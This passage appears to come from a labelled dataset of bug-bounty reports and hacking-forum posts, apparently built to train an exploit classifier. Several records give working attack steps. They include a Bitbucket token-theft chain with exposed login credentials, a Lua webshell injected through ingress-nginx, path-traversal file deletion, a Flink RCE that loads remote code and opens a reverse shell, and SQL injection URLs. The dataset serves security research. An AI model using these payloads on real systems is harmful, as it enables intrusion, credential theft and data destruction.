parameter\n\nHi,\n\n\nI have found an issue which can be used by an attacker to steal Bitbucket access token along with Other third party access tokens(google, salesforce etc). But the most important one is bitbucket. \n\n\nIssue:\n=====\n\n\n* there is open redirect while loggin to gitlab Via SAML, while the Open redirect is not much impactful since it is a post based request coming from third party domain, but the redirect happens and is also saved along in the gitlab cookies while being redirect and next time user visits `gitlab.com/user/sign_in`, he is automatically sent to the redirect\n\n\n### open redirect:\n{F2260468}\n\n\nThis chain can be used to steal third party access token `login with google, github, bitbucket, twitter, salesforce ....... etc` but we will focus on bitbucket for the following reason:\n\nIt has the presaved oauth scopes which is wide and also the client id is same as that of when you use the import project from bitbucket feature:\n\n{F2260558}\n\n\nScope : (Read acccess to all data in account and some write access, projects's wikis):\n\n{F2260561}\n\n\nsimilar is the case for Github, but Github doesn't allow implicit grant. \n\n### implicit grant for bitbucket:\n\nthis simply returns access token as bearer to attacker's domain , which can be used to access full bitbucket api.\n\nThis makes both users vulnerable,:\n`people who chose to log in with bitbucket`\n`people who chose other means of login, but have previously imported project from bitbucket into gitlab`\n\nPOC:\n=====\n\n ### As victim:\n\n make sure you have previously used bitbucket with gitlab, weather for login with bitbucket or for importing project.\n\n\n### As attacker:\n\n* setup a group with SAML Login and setup a user to log into gitlab with SAML\n\nHere are my credentials for triage purposes: (Please note i will revoke these credentials upon triage, let me know if you need them longer or dont need them at all)\n\nhttps://bugcrowd-iambull-2.oktapreview.com/\n\nusername: `gitlab@gitlab.com`\npassword : `Gliatb4passtbx!`\n\nsecurity answer: `Gliatb`\n\n\n\n\nPOC:\n=====\n\n\n* log victim out with Logout CSRF\n\n* use SAML creds to save open redirect for victim:\n\nhttps://bugcrowd-iambull-2.oktapreview.com/app/bugcrowd-iambull-2_gitlabcom_1/exk1lit3jovMjvewh0h8/sso/saml?RelayState=.witcoat.com\n\n* initiate bitbucket oauth by changing response_type to `token`\n\nhttps://bitbucket.org/site/oauth2/authorize?client_id=b9jLmh8WCLZPBAwWba&redirect_uri=https%3A%2F%2Fgitlab.com%2Fusers%2Fauth%2Fbitbucket%2Fcallback&response_type=token&state=DoesNotMatter\n\n* try using stolen bitbucket api:\n\n```\nGET /2.0/repositories/%7B766210f9-9bec-4010-9f4d-917b06661c0c%7D HTTP/2\nHost: api.bitbucket.org\nUser-Agent: curl/7.79.1\nAccept: */*\nAuthorization: Bearer Txpo3AXXQZHlp....\n\n```\n\n\n\n\nhere is the poc for doing everything step by step, **please note all this can be automated with window.open for 1 click exploit**\n\n\n```\n\nGitLab\n\n\n\n\t\nLogout of gitlab if logged in:\n\n
\n\n
\n
\n
\n
\n\nOpen redirect via SAML:\n\n
\n\t \n\t
\n
\n\n\nsteal oauth access Token For Bitbucket:\n\n
\n\t \n \n \n \n\n\n\t\n
\n\n\n\n\n\n\n\n```\n\n\n\nhere is the video of going through steps:\n\n{F2260621}\n\n## Phishing ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "21279302b9ee32de9eda", "text": "[Cryptographic Issues - Generic] Multiple OpenSSL error handling issues in nodejs crypto library\n\n**Summary:** NodeJS up to 19.2.0 does not clear the OpenSSL error stack after operations that may set it\n\n**Description:** NodeJS up to 19.2.0 does not clear the OpenSSL error stack after operations that may set it. This may lead to false positive errors during subsequent cryptographic operations that happen to be on the same thread.\n\n## Steps To Reproduce:\n\nThe following issues have reproduction cases:\n\nhttps://github.com/nodejs/node/pull/45495\nhttps://github.com/nodejs/node/pull/45377\n\nUpon reviewing the code in crypto_x509.cc, at least one other function lacks use of ClearErrorOnReturn - X509Certificate::CheckPrivateKey.\n\nhttps://github.com/nodejs/node/blob/main/src/crypto/crypto_x509.cc#L432\n\n## Impact:\n\nOn our application, JWTs failed to sign after a certificate fails to verify on the same thread.\n\n## Impact\n\nIf the server verifies certificates using Node's X509Certificate API, it may fail to sign other users' auth tokens: if a certificate fails to verify, the error from the previous failing call is applied to the next call that should succeed. It is worth auditing all OpenSSL entry points to see if they can cause errors to be raised.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "79d4f2aacd17e603a08a", "text": "[Code Injection] RCE on ingress-nginx-controller via Ingress spec.rules.http.paths.path field\n\nReport Submission Form\n\n## Summary:\n\nA user with ingress create/update privilege may inject config into `nginx.conf` with `path`.\nConfig the log_format and access_log to write arbitrary file.\nInclude the file we created to bypass `path` sanitizer to RCE.\n\n## Kubernetes Version:\n\n```\nserverVersion:\n buildDate: \"2022-03-06T21:32:53Z\"\n compiler: gc\n gitCommit: e6c093d87ea4cbb530a7b2ae91e54c0842d8308a\n gitTreeState: clean\n gitVersion: v1.23.4\n goVersion: go1.17.7\n major: \"1\"\n minor: \"23\"\n platform: linux/amd64\n```\n\n## Component Version:\n\n```\n-------------------------------------------------------------------------------\nNGINX Ingress controller\n Release: v1.2.1\n Build: 08848d69e0c83992c89da18e70ea708752f21d7a\n Repository: https://github.com/kubernetes/ingress-nginx\n nginx version: nginx/1.19.10\n\n-------------------------------------------------------------------------------\n```\n\n## Steps To Reproduce:\n\n 1. Create a kind cluster config\n\nlab.yaml\n```yaml\nkind: Cluster\nname: lab\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n# the control plane node config\n- role: control-plane\n kubeadmConfigPatches:\n - |\n kind: InitConfiguration\n nodeRegistration:\n kubeletExtraArgs:\n node-labels: \"ingress-ready=true\"\n extraPortMappings:\n - containerPort: 80\n hostPort: 80\n protocol: TCP\n - containerPort: 443\n hostPort: 443\n protocol: TCP\n# the three workers\n- role: worker\n- role: worker\n- role: worker\n```\n\n 2. Create a testing cluster with the previous config\n\n```bash\nkind create cluster --config lab.yaml\n```\n\n 3. Install nginx-ingress-controller\n\n```bash\nkubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml\n```\n\n 4. Create a the first malicious ingress\n\n**This ingress will allow attacker to write arbitrary content to arbitrary file.**\n(note that the service `not-exist-service` does not need to exist)\n\nwrite_ingress.yaml\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: webexp\nspec:\n rules:\n - host: \"example.com\"\n http:\n paths:\n - path: \"/x/ {\\n\n }\\n\n }\\n\n log_format exploit escape=none $http_x_ginoah;\\n\n server {\\n\n server_name x.x;\\n\n listen 80;\\n\n listen [::]:80;\\n\n location /z/ {\\n\n access_log /tmp/luashell exploit;\\n\n }\\n\n location /x/ {\\n\n #\"\n pathType: Exact\n backend:\n service:\n name: not-exist-service\n port:\n number: 8080\n```\n\nApply the first malicious ingress config\n```bash\nkubectl apply -f write_ingress.yaml\n```\n\n 5. Write a malicious lua config to `/tmp/luashell`\n\nNote that in other cluster config, the `localhost` may need to change to ingress-controller's ip.\n```bash\ncurl localhost/z/ -H \"host: x.x\" -H 'x-ginoah: content_by_lua_block {ngx.req.read_body();local post_args = ngx.req.get_post_args();local cmd = post_args[\"cmd\"];if cmd then f_ret = io.popen(cmd);local ret = f_ret:read(\"*a\");ngx.say(string.format(\"%s\", ret));end;}'\n```\n\n 6. Create a the second malicious ingress\n\n**This ingress will include the malicious lua config, which allow attack to execute arbitrary command.**\n\nwebshell_ingress.yaml\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: webexp\nspec:\n rules:\n - host: \"example.com\"\n http:\n paths:\n - path: \"/x/ {\\n\n }\\n\n }\\n\n log_format exploit escape=none $http_x_ginoah;\\n\n server {\\n\n server_name x.x;\\n\n listen 80;\\n\n listen [::]:80;\\n\n location /z/ {\\n\n include /tmp/luashell;\\n\n }\\n\n location /x/ {\\n\n #\"\n pathType: Exact\n backend:\n service:\n name: not-exist-service\n port:\n number: 8080\n```\n\n", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "40203924a1b7a726fb5a", "text": "[Code Injection] RCE vulnerability in apache-airflow-providers-apache-sqoop 3.1.0\n\nIn airflow.providers.apache.sqoop.hooks.sqoop.SqoopHook._prepare_command, users can control -libjars through libjars in Connection. -libjars makes sure each MR task gets these jars in classpath, So I can set this as a malicious Jar package, causing arbitrary system commands to be executed on the machine performing the MR task.\n\nThis is a screenshot of my email reporting this vulnerability\n██████████\n\n## Impact\n\nRemote Code Execution", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0bccd491bc7da53699da", "text": "[Buffer Over-read] Read beyond bounds in mod_isapi.c [zhbug_httpd_41]\n\nGreetings. I have found a read-beyond-bounds bug in httpd that arises from an apparent logic error.\n\nThe bug is in /modules/arch/win32/mod_isapi.c, on lines 979 and/or 983, which use the length of the path to the ISAPI DLL (|strlen(r->filename)|) to index into the string specified by the ISAPI DLL itself in its call to ServerSupportFunction/HSE_REQ_MAP_URL_TO_PATH, which contains unrelated data. This error presumably can be exploited under appropriate conditions.\n\nThis bug is still present in trunk.\n\nRelevant code:\n```\n966: case HSE_REQ_MAP_URL_TO_PATH:\n967: {\n968: /* Map a URL to a filename */\n969: char *file = (char *)buf_data;\n970: apr_uint32_t len;\n971: subreq = ap_sub_req_lookup_uri(\n972: apr_pstrndup(cid->r->pool, file, *buf_size), r, NULL);\n973:\n974: if (!subreq->filename) {\n975: ap_destroy_sub_req(subreq);\n976: return 0;\n977: }\n978:\n979: len = (apr_uint32_t)strlen(r->filename);\n980:\n981: if ((subreq->finfo.filetype == APR_DIR)\n982: && (!subreq->path_info)\n983: && (file[len - 1] != '/'))\n984: file = apr_pstrcat(cid->r->pool, subreq->filename, \"/\", NULL);\n985: else\n986: file = apr_pstrcat(cid->r->pool, subreq->filename,\n987: subreq->path_info, NULL);\n988:\n989: ap_destroy_sub_req(subreq);\n990:\n991: #ifdef WIN32\n992: /* We need to make this a real Windows path name */\n993: apr_filepath_merge(&file, \"\", file, APR_FILEPATH_NATIVE, r->pool);\n994: #endif\n995:\n996: *buf_size = apr_cpystrn(buf_data, file, *buf_size) - buf_data;\n997:\n998: return 1;\n999: }\n```\nAttached is a POC that demonstrates the bug. To use it:\n\n 1. Add the specified lines to httpd.conf.\n 2. Build dllmain.cpp and foo.def into foo.dll.\n 3. Create the folder /bug41 in the webserver root.\n 4. Copy foo.dll into /bug41 .\n 5. Run httpd and attach a debugger to it.\n 6. Set a BP on line 969, above.\n 7. Open a browser (or CURL) and attempt to load the URL /bug41/foo.dll .\n 8. When the BP fires, step through line 979.\n 9. Notice that |r->filename| is something like \"g:/serverroot/bug41/foo.dll\" (the filesystem path to the ISAPI DLL) and that |len| is its length.\n 10. Notice that |file| points to a 0 byte string (string length 0), which is what HttpExtensionProc() in foo.dll sent in its call to ServerSupportFunction/HSE_REQ_MAP_URL_TO_PATH (dllmain.cpp line 30).\n 11. Step once more and notice that line 983 reads one byte from |len-1| bytes beyond the end of |file|.\n```\n-------- httpd.conf lines ----------------------------------------------------\n\n AddHandler isapi-handler .dll\n Options ExecCGI\n Allow from all\n\n-------- httpd.conf lines ----------------------------------------------------\n```\n```\n-------- dllmain.cpp ----------------------------------------------------\n#include \n#include \n\nBOOL APIENTRY DllMain( HMODULE hModule,\n DWORD ul_reason_for_call,\n LPVOID lpReserved\n )\n{\n switch (ul_reason_for_call)\n {\n case DLL_PROCESS_ATTACH:\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n}\n\nBOOL WINAPI GetExtensionVersion(HSE_VERSION_INFO * pVI) {\n return TRUE;\n}\n\nDWORD WINAPI HttpExtensionProc(EXTENSION_CONTROL_BLOCK* pECB) {\n\n char buf[] = \"\";\n DWORD bufSize = sizeof(buf);\n\n pECB->ServerSupportFunction(\n pECB->ConnID, HSE_REQ_MAP_URL_TO_PATH, buf, &bufSize, NULL);\n\n return HSE_STATUS_SUCCESS;\n}\n-------- dllmain.cpp ----------------------------------------------------\n\n-------- foo.def ----------------------------------------------------\nLIBRARY foo\nEXPORTS\n DllMain\n GetExtensionVersion\n HttpExtensionProc\n-------- foo.def ----------------------------------------------------\n```\n\n## Impact\n\nBeyond bounds data might be r", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d87cf416ef610a06c10a", "text": "There is a free tool online called Email-Extractor Email Extractor - Online tool for extracting any email address (email-checker.net) That can extract email addresses from the text content. I hope you found this helpful", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "591adaa50e3d22403bde", "text": "[Business Logic Errors] Program managers can see draft reports using Export Reports feature\n\n**Summary:**\n\nHello. I have discovered a bug in the new draft feature. \n\nProgram managers can see draft reports using Export Reports feature. \n\n### Steps To Reproduce\n\n1. Make a draft (do not send) report on a public/private program.\n2. Go to the `https://hackerone.com//export_reports` page and export reports.\n3. Check your e-mail and download the file got from HackerOne.\n4. Check the CSV file:\n\n{F1860656}\n\nAs you see, it says draft and disclosed report title, severity, weakness, etc.\n\nWhen you try to find it in the program inbox you can't find it, so completely sure this is a bug.\n\n{F1860658}\n\n## Impact\n\nProgram managers can see draft reports using Export Reports feature leads to PII disclosure without reporter permission.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "84e631e290418453c184", "text": "[Unknown] Bypassing Garbage Collection with Uppercase Endpoint\n\n## Summary:\nThis report highlights a vulnerability in the garbage collection process, where the endpoint \"/metrics\" can be bypassed by using uppercase letters.\nAdditionally, it is important to note that if your system contains similar endpoints, they might also be susceptible to the same bypass method. This report aims to provide comprehensive information about the vulnerability and its potential impact.\n\n## Steps To Reproduce:\n1. Make an HTTP request to the URL: https://injob.indriver.com/api/metrics\n- ```curl -X GET \"https://injob.indriver.com/api/metrics\" -H \"Content-Type: application/json\"```\n- Observe the response, which is expected to be \"forbidden\" (HTTP 403).\n- {F2523755}\n\n2.Make another HTTP request to the URL: https://injob.indriver.com/api/METRICS\n- ```curl -X GET \"https://injob.indriver.com/api/METRICS\" -H \"Content-Type: application/json\"```\n\n- Observe the response, which is expected to be \"success\" (HTTP 200).\n- {F2523756}\n\n## Impact\n\nThe impact of this vulnerability includes unauthorized access to sensitive information or resources, potential data manipulation, and a potential risk of further escalation in the system. Furthermore, if other endpoints with similar patterns exist in your system, they might also be vulnerable to the same bypass method, exposing the system to additional security risks.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "64423f066434566b83b9", "text": "[Path Traversal] CVE-2020-3187 - Unauthenticated Arbitrary File Deletion\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.\n\nThe IP has a SSL certificate pointing to .█████\ncurl -kv https://█████████/\n\noutput\n```\nServer certificate:\n* subject: █████████.mil\n```\n\n## Impact\n\nAn exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3187\n\n## Steps to Reproduce\n1.First I performed a curl request to validate that /session_password.html gave a 200 response.\ncurl -k -s -i https://███/+CSCOE+/session_password.html\n2.Example to delete logo file \"/+CSCOU+/csco_logo.gif\".\ncurl -k -H \"Cookie: token=../+CSCOU+/csco_logo.gif\" https://██████/+CSCOE+/session_password.html\n\n_NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device_\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3187"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aa3bec506d4d0720827b", "text": "[Command Injection - Generic] Apache Flink RCE via GET jar/plan API Endpoint\n\n## Summary:\n\nAiven has not restricted access to the GET `jars/{jar_id}/plan` API. This endpoint can be used to load java class files with the specified arguments that are in the java classpath on the server. This can be abused to gain RCE on the Apache Flink Server.\n\n## Steps To Reproduce:\n\nThe video below shows how to setup the Apache Flink instance and run the PoC. Feel free to use my VPS which will make triaging somewhat easier (`ssh ████████`, password: `██████`):\n\n█████████\n\n\n 1. Login to my aiven account: `████`, password: `██████`\n 1. Run the SQL job as demonstrated in the video\n 1. Open the Flink Web UI and verify that there is a new job in the jobs panel.\n 1. Setup netcat reverse shell listener on the VPS: `nc -n -lvp 8888`\n 1. Update the poc.py variables to match your instance, if you are not using my Apache Flink instance\n 1. Run the poc: `python3 poc.py`\n 1. Reverse shell connection should pop up\n 1. After connection has been closed, the Apache Flink will crash, so the Aiven service daemon will have to restart it. Because of this, you have to run new SQL job after every time you run the poc script\n\n# API Request\n\nHere's the HTTP API request that exploits the issue:\n\n```http\nGET /jars/145df7ff-c71a-4f3a-b77a-ee4055b1bede_a.jar/plan?entry-class=com.sun.tools.script.shell.Main&programArg=-e,load(\"https://fs.bugbounty.jarijaas.fi/aiven-flink/shell-loader.js\")¶llelism=1 HTTP/1.1\nHost: ████\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nAuthorization: Basic █████\nsec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"\nAccept: application/json, text/plain, */*\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\nsec-ch-ua-platform: \"Windows\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Language: en-US,en;q=0.9,fi;q=0.8\n```\n\n## Impact\n\nAttacker can execute commands on the server and use this access to potentially pivot into other resources in the network.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fdded81e98f09557c69e", "text": "image 1267×843 227 KB having similar issue, its taking longer than the time laps given for the ip and port needing help for mking the passlist", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-04-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a8b4c83eea3dd7259b1c", "text": "May I suggest the following: I think the exercise with the nomachine setup could be greatly simplified by simply providing the pcap file. the setup with nomachine is really cumbersome, I get timeouts every couple of minutes and reconnecting takes another couple of minutes. Like this it is just a pain.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c89ae00bfda44e86c2ee", "text": "[Information Disclosure] Potential IP revealing using UNC Path in Windows File Picker\n\nThis report is inspired by #294364. The release note says that after fixing [Bug 26424](https://trac.torproject.org/projects/tor/ticket/26424), UNC path is disabled in Tor. But I found that I can still type UNC path in Windows file picker dialog box, and that sends requests to remote servers without Tor proxy.\n\nSome social engineering is required to exploit this trick though. Attackers can use on their website, and trick users to click \"Browse\" and type an attacker-controlled IP address into file picker in UNC format.\n\nIs it possible to disable UNC path in the Windows file picker? If not, how about showing a warning message?\n\n## Impact\n\nWith some social engineering, attackers can know user's real IP address with .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1e6ec1bd6438badcb726", "text": "[Unknown] [Java]: Flow sources and steps for JMS and RabbitMQ\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9ff344f6192491039e92", "text": "[Improper Authentication - Generic] Traffic amplification attack via discovery protocol\n\n**Summary:** It’s possible to use UDP discovery protocol to amplify DDoS attacks. Ping-pong mechanism that was intended to protect against it isn’t properly implemented. An attacker can successfully finish it, even with spoofed IP. Then he can send \"FindNodePeerMessage\" with spoofed IP in UDP packet and RSKJ node will send much larger \"NeighborsPeerMessage\" to third-party victim. This way an attacker can easily perform DDoS attack both on RSKJ node and third-party server.\n\n**Description:** An attacker can send \"PingPeerMessage\" with his correct IP as source IP. It will cause RSKJ node to send \"PingPeerMessage\" with random \"check\" value to the attacker. Then he can reply with \"PongPeerMessage\" containing correct \"check\" but with spoofed IP. RSKJ doesn't check if pong message comes from the same IP as ping message and this way spoofed IP is added to establishedConnections. Then attacker can send \"FindNodePeerMessage\" with spoofed IP to perform traffic amplification attack. This vulnerability can be resolved by checking if source IP in pong message is the same as IP in ping message.\n\n## Steps To Reproduce:\n\n 1. Send \"PingPeerMessage\" with correct victim's IP\n 2. Wait for \"PingPeerMessage\" from RSKJ\n 3. Send \"PongPeerMessage\" with correct \"check\" value but spoofed IP\n 4. Send \"FindNodePeerMessage\" in a loop to perform traffic amplification attack\n\nI'm attaching PoC in the attachment. Need to fill correct RSKJ node IP and port and DDoS victim's IP (and run with root privileges on attacker's host).\n\n## Supporting Material/References:\n\n * I'm sending patch in the attachment\n\n## Impact\n\nIt makes much easier to perform DDoS attack and it can lead to DoS both of RSKJ node and third-party servers.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "607951e3caa412aea42e", "text": "I got to the point where I can read and need to pwn leak . I can call handler and get Bye back. I also understand that there are not enough rop gadgets to call system. I tried ret2csu , but as I understand there are also not enough gadgets for this. I’m trying to ret2dl , w/ pwntools. But it says that it can’t find any instructions for syscall. Given the progression of the challenge, it feels like I’m chasing a rabbithole and it should be simpler than that. Can anyone give a hint?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-07-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2fe9bbd8bd1809129134", "text": "Hello my brothers and sisters. I am completely lost on the this wireshrak-lab2. I cannot connect to target IP. By reading the comments I see im supposed ot connect to NOMACHINE which is not in the instructions. tried doing that and nothing happens, says it not configured or something of that nature. I could really use some help.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "439e8532a51327268731", "text": "I am also having issue with the final assessment. I didn’t think to take notes when completing the earlier labs. I have gathered from reading the threads that Harry Potter was the employee we found earlier. I have tried to go back into that lab to see what the password requirements were and any other clues etc. But it will not let me back onto that page, perhaps because I already completed with and input the flag? I tried using CUPP with Harry and Harry Potter. I also used the usernameGenerator with Harry Potter and have tried hyrda attacking ssh with those two lists I generated. Can someone help point me in what I am missing please?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4f6d0b497445f4868dbe", "text": "[Uncontrolled Resource Consumption] curl \"globbing\" can lead to denial of service attacks\n\n## Summary:\n[add summary of the vulnerability]\n\nThe curl \"globbing\" allows too much scope, which can cause the server to be denied service or used to attack third-party websites. The globbing allow [1-9999999999999999999] to parse in the url. So when curl request for 'http://127.0.0.1/[1-9999999999999999999]', the can cause 300 requests in the server.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Listen 8000 port: python -m SimpleHTTPServer 8000\n 2. command: nohup ./curl -vv 'http://127.0.0.1:8000/[1-9999999999999999999]/' &\n 3. Check the server resource process. There are a lot of network requests and CPU consumption. \n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nWith this function, the resources of the server running curl request can be excessively consumed or a large number of URL accesses to other websites can be initiated, resulting in denial of service.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "54c912ce75a9ea2f092b", "text": "[Weak Password Recovery Mechanism for Forgotten Password] broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)\n\ntarget :-https://network.tochka.com/\n\nbug:-- Broken Authentication (Password Reset Link Not Expired After Use)\nseverity:- medium(“Insufficient Security Configurability >Weak Reset Password Implementation > Token Not Invalidated After Use”)\n\nSteps To Find This Bug:\n1.Go to https://network.tochka.com/sign-up\n2. Enter your email, and ask for a password reset link.\n3. Now go to mail and open that link in two tabs.\n4. Reset the password from one tab, reload the other tab , and if it let’s you reset password again then it is vulnerable to token not invalidated after use as we are resetting the password two times with same token.\n\nPOC :-\nAttached\n\nImpact/Exploit Scenario:\nIf victim’s email account is still logged into his/her Office Computers or any public Internet Café. Then any external attacker can use the used token to reset victims password.\nImpact\nIf victim’s email account is still logged into his/her Office Computers or any public Internet Café. Then any external attacker can use the used token to reset victims password.\n\n## Impact\n\nIf victim’s email account is still logged into his/her Office Computers or any public Internet Café. Then any external attacker can use the used token to reset victims password.\nImpact\nIf victim’s email account is still logged into his/her Office Computers or any public Internet Café. Then any external attacker can use the used token to reset victims password.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "00915f52fb6581622536", "text": "[SQL Injection] SQL Injection on █████\n\n#### Background:\nIt looks like the patch for #231338 has been reverted and this subdomain is yet again vulnerable to SQL injection.\n\n### Summary:\nAn Airforce subdomain is vulnerable to SQL Injection because the application does not produce sufficient validation on user input. This allows an attacker to execute SQL queries.\n\n### Description:\nThe `███=` parameter on `https://███████/█████████` does not properly sanitize ' characters, allowing an attacker to execute SQL queries!\n\n### Impact\n\nThis could potentially expose sensitive information because an attacker could potentially dump the databases on this server!\n\n### Step-by-step Reproduction Instructions\n\n 1.) Open Firefox or any browser\n 2.) Visit `https://███████/██████████=' and updatexml(null,concat(0x0a,version()),null)-- -@hackerone.mil`\n 3.) You will see the MySQL version in the response => `██████████`\n\nUser - `███████`\npayload => `https://████████/████████████=' and updatexml(null,concat(0x0a,user()),null)-- -@hackerone.mil`\n\nDatabase - `████`\npayload => `https://██████/█████████████=%27%20and%20updatexml(null,concat(0x0a,database()),null)--%20-@hackerone.mil`\n\n██████\n### Suggested Mitigation/Remediation Actions\n\nSanitize input!\n\nThanks!\n- Corben Douglas [@sxcurity](https://twitter.com/sxcurity)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d50cc88fc2b890ad1904", "text": "[Improper Authorization] [HTA2] Authorization Bypass on https://██████ leaks confidential aircraft/missile information\n\n## Summary:\nThere is an authorization bypass on https://██████ which allows a remote, unauthenticated attacker to bypass the \"██████Single Sign-On\" and view the application as an authenticated user.\n\n## Details:\nThe host at ████ uses Akamai as a load balancer and routes traffic back to an internal server:\n\n```\nroot@doggos:~# dig A ████\n-- snip --\n;; ANSWER SECTION:\n███. 2386\tIN\tCNAME\t█████.\n████. 1554 IN CNAME ███.\n███████. 180 IN CNAME e1010.d.akamaiedge.akamai.████��████.\ne1010.d.akamaiedge.akamai.██████.\t20 IN A\t██████████\n``` \n\nWhen attempting to hit the website, you are redirected to `https://█████████/pool/sso/authenticate/l/2?m=GET&r=t&u=https%3A%2F%2F████████%2F` and requires the visitor to authenticate via SSO.\n\nHowever, I was able to find the Origin IP of this server. Hitting this Origin IP completely circumvents the ████████ SSO and allows the visitor to use the application as an authenticated user.\n\n## Steps To Reproduce:\n 1. Try visiting the application here: https://███. You'll see you are redirected to login via SSO.\n\n█████████\n\n 2. Run the following command to verify that ████ is the Origin IP for `█████████` by pulling the names from the SSL certificate:\n\n```\nroot@doggos:~# true | openssl s_client -connect ██████:443 2>/dev/null | 